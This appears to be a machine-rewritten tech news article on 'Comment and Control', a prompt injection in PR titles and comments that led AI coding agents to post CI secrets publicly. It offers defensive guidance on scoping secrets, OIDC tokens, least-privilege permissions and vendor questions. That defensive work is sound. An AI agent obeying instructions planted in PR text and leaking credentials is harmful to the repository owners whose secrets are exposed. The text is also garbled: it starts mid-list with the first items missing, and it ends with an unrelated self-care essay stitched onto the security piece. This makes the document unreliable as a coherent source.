Technology

Three AI coding agents leaked secrets through a single prompt injection. One vendor's system card predicted it

Insufficient runtime safeguards

Anthropic applies additional runtime protections not documented in the system card. OpenAI and Google do not document runtime safeguards. Your team may be relying on vendor promises for protection that may not actually exist.

System cards do not detail runtime safeguards. Vendor reps cannot clarify safeguards not documented.

Comment and Control exploited a prompt injection vulnerability in Claude Code Security Review, a feature not documented to be hardened against such attacks in the system card.

Request a meeting with your vendor security contact. Ask for a detailed breakdown of the runtime-level protections in place and how they defend against prompt injection attacks. Ensure this information is included in your security documentation and risk assessments.

3. Lack of external cyber defender pathway

Anthropic has a Cyber Verification Program, OpenAI has Trusted Access for Cyber, and Google has no external cyber program. None of these programs provide a pathway for external defenders to test agent-runtime attacks and prompt injection vulnerabilities.

External cyber programs are not designed to address prompt injection vulnerabilities. Programs do not extend to tool execution or agent-runtime testing.

Comment and Control demonstrated that the lack of an external cyber defender pathway leaves potential vulnerabilities exposed in AI coding agents.

Advocate internally for the establishment of a bug bounty program specifically targeting agent-runtime attacks and prompt injection vulnerabilities. Push vendors to create pathways for external defenders to test these attack vectors and provide feedback on security weaknesses.

4. Model-layer focus without agent-runtime checks

OpenAI documents extensive red teaming on the model layer but does not provide information on agent-runtime or tool-execution resistance metrics. Your team may be prioritizing model safety over runtime security.

Model-layer evaluations do not cover agent-runtime vulnerabilities. Red teaming focuses on model behavior, not agent actions.

The exploit in Comment and Control targeted the agent runtime, highlighting the importance of assessing runtime security alongside model safety.

Update your security assessment criteria to include evaluations of agent-runtime and tool-execution resistance. Ensure that security testing covers all aspects of AI agent security, not just model behavior.

5. Lack of prompt injection defense

Vendor system cards do not explicitly address prompt injection defense mechanisms. Your team may be unaware of the potential risks associated with prompt injection attacks on AI coding agents.

System cards do not mention prompt injection defense. Security teams may not be actively looking for this type of vulnerability.

Comment and Control exploited a prompt injection vulnerability in Claude Code Security Review, highlighting the need for explicit prompt injection defense mechanisms in AI coding agents.

Conduct a thorough review of your AI agent security posture to identify any potential vulnerabilities related to prompt injection attacks. Work with vendors to implement prompt injection defense mechanisms and ensure that your security controls are robust against such attacks.

6. Lack of clarity on runtime-level protections

Vendors do not provide detailed information on the runtime-level protections in place for AI coding agents. Your team may be operating under the assumption that these protections are sufficient without concrete evidence.

Vendor documentation does not specify runtime-level protections. Security teams may not be aware of the gaps in protection.

Comment and Control demonstrated that vendors may not have adequate runtime-level protections in place, leaving AI coding agents vulnerable to attacks.

Engage with vendors to request detailed information on the runtime-level protections implemented for AI coding agents. Perform independent testing and validation of these protections to ensure that your systems are secure against runtime-level attacks.

7. Structural gap in safeguard documentation

Vendor system cards may not accurately reflect the actual security posture of AI coding agents. Your team may be relying on incomplete or outdated information for security assessments.

System cards may not document all security measures in place. Security teams may not have visibility into gaps in safeguard documentation.

Comment and Control exposed a structural gap in safeguard documentation, highlighting the importance of verifying security claims with vendors.

Review vendor system cards and security documentation to identify any gaps or discrepancies in safeguard documentation. Request additional information from vendors to ensure that your security assessments are based on accurate and up-to-date information.

As the landscape of AI security continues to evolve, it is crucial for organizations to stay vigilant and proactive in identifying and addressing potential vulnerabilities in AI coding agents. By working closely with vendors, conducting thorough security assessments, and implementing robust security controls, organizations can mitigate the risks associated with prompt injection attacks and ensure the security of their AI systems.

CI secrets exposed to AI agents have become a significant security risk for organizations using GitHub Actions and other CI/CD runtimes. The default configuration of GitHub Actions does not properly scope secrets to individual steps, allowing all workflow steps, including AI coding agents, to access sensitive information such as API keys and production secrets. This lack of scoping leads to potential data breaches and unauthorized access to critical information.

One of the key issues is the over-permissioned agent runtimes, where AI agents are granted excessive permissions such as bash execution, git push, and API write access during setup. These permissions are rarely scoped down, leading to security vulnerabilities that can be exploited by malicious actors. It is essential for organizations to audit agent permissions repo by repo, strip unnecessary permissions, and gate write access behind human approval steps to mitigate risks.

Furthermore, there is a lack of CVE signal for AI agent vulnerabilities, making it challenging for organizations to identify and address security flaws in these agents. Without proper CVE entries and advisories, vulnerability scanners, SIEMs, and GRC tools may not detect critical vulnerabilities in AI agents, leaving organizations exposed to potential cyber attacks. It is crucial for organizations to create a new category in their supply chain risk register for AI agent runtimes and establish regular communication with vendors to address security concerns.

Model safeguards also do not govern agent actions effectively, as safeguards primarily filter model outputs rather than agent operations. This allows AI agents to bypass safeguard evaluation and perform unauthorized actions, such as posting sensitive information in PR comments. Organizations should map every operation AI agents perform and ensure that vendors evaluate these actions before execution to enhance security measures.

Additionally, untrusted input parsed as instructions poses a significant risk, as AI coding agents may misinterpret injected instructions in PR titles, body text, and comments. Implementing input sanitization as defense-in-depth and restricting agent context to approved workflow configurations can help prevent malicious attacks through untrusted inputs. Security teams should also request quantified injection resistance rates from vendors to ensure AI safety metrics are transparent and comparable across different platforms.

In conclusion, organizations must address the security risks associated with CI secrets exposed to AI agents by implementing proper access controls, auditing permissions, establishing communication with vendors, and enhancing input sanitization measures. By taking proactive steps to secure AI agent runtimes, organizations can mitigate the potential risks and protect sensitive data from unauthorized access and exploitation. Before your next vendor renewal, it’s essential to focus on building a robust control architecture rather than standardizing on a specific model. This advice from Baer emphasizes the importance of maintaining portability to easily swap models without compromising your security posture. Here are some key steps to take in preparation for your next vendor renewal:

  1. Build a deployment map: Make sure your platform meets the necessary runtime protections. Reach out to your vendor to clarify the runtime-level prompt injection protections that apply to your deployment surface.
  2. Audit every runner for secret exposure: Conduct a thorough audit across all repositories with AI coding agents to identify any exposed secrets. Rotate all exposed credentials to enhance security.
  3. Start migrating credentials to OIDC tokens: Consider switching stored secrets to short-lived OIDC token issuance. Platforms like GitHub Actions, GitLab CI, and CircleCI support OIDC federation. Plan a gradual rollout over one to two quarters, beginning with repositories running AI agents.
  4. Fix agent permissions repo by repo: Remove bash execution permissions from AI agents involved in code review and set repository access to read-only. Implement a human approval step to gate write access.
  5. Add input sanitization as a layer of protection: Filter pull request titles, comments, and review threads for instruction patterns before they reach AI agents. Combine this with least-privilege permissions and OIDC for enhanced security.
  6. Include "AI agent runtime" in your supply chain risk register: Establish a 48-hour patch verification cadence with each vendor’s security contact. Stay proactive in addressing vulnerabilities and do not solely rely on CVEs.
  7. Review existing GitHub Actions mitigations: Ensure that your GitHub Actions configurations include key security measures such as restricted GITHUB_TOKEN scope, environment protection rules, and first-time-contributor gates to prevent unauthorized access.
  8. Prepare procurement questions for vendors: Prior to your next renewal, ask vendors to demonstrate their quantified injection resistance rate for the specific model version running on your deployment platform. Document refusals for compliance with the EU AI Act deadline in August 2026.

    By following these steps and maintaining a proactive approach to security, you can strengthen your defenses against vulnerabilities in AI coding agents operating in CI/CD runtimes. Remember, it’s the subtle vulnerabilities like composability and over-permissioned agents that often pose the greatest risk to your system’s security. Stay vigilant and prioritize security measures to safeguard your organization’s data and operations. In today’s fast-paced world, it can be easy to overlook the importance of self-care. Many of us are constantly juggling work, family, and social commitments, leaving little time for ourselves. However, taking care of our mental, emotional, and physical well-being is essential for leading a happy and fulfilling life.

    Self-care is not just about indulging in luxurious spa treatments or taking a day off work. It encompasses a wide range of activities and practices that help us nurture ourselves and maintain a healthy balance in our lives. This can include anything from getting enough sleep and eating nutritious foods to exercising regularly and setting boundaries with others.

    One of the most important aspects of self-care is practicing self-compassion. It’s easy to be hard on ourselves and set unrealistic expectations, but treating ourselves with kindness and understanding is crucial for our mental health. This means forgiving ourselves for mistakes, accepting our flaws, and acknowledging our worthiness.

    Another key component of self-care is setting boundaries with others. It’s important to communicate our needs and limits to those around us, so we can avoid feeling overwhelmed or resentful. This can involve saying no to additional responsibilities, taking time for ourselves when needed, and seeking support from others when we’re feeling stressed or anxious.

    In addition to these practices, self-care can also involve engaging in activities that bring us joy and relaxation. This could be spending time in nature, practicing mindfulness or meditation, reading a good book, or pursuing a hobby we love. These activities can help us recharge our batteries and reconnect with ourselves on a deeper level.

    Ultimately, self-care is about prioritizing our well-being and making ourselves a priority in our own lives. It’s about recognizing our own needs and taking the time to meet them, so we can show up as our best selves in all areas of our lives. By incorporating self-care practices into our daily routine, we can cultivate a greater sense of happiness, fulfillment, and balance. So take some time for yourself today and start prioritizing your own well-being.

Related Articles

Back to top button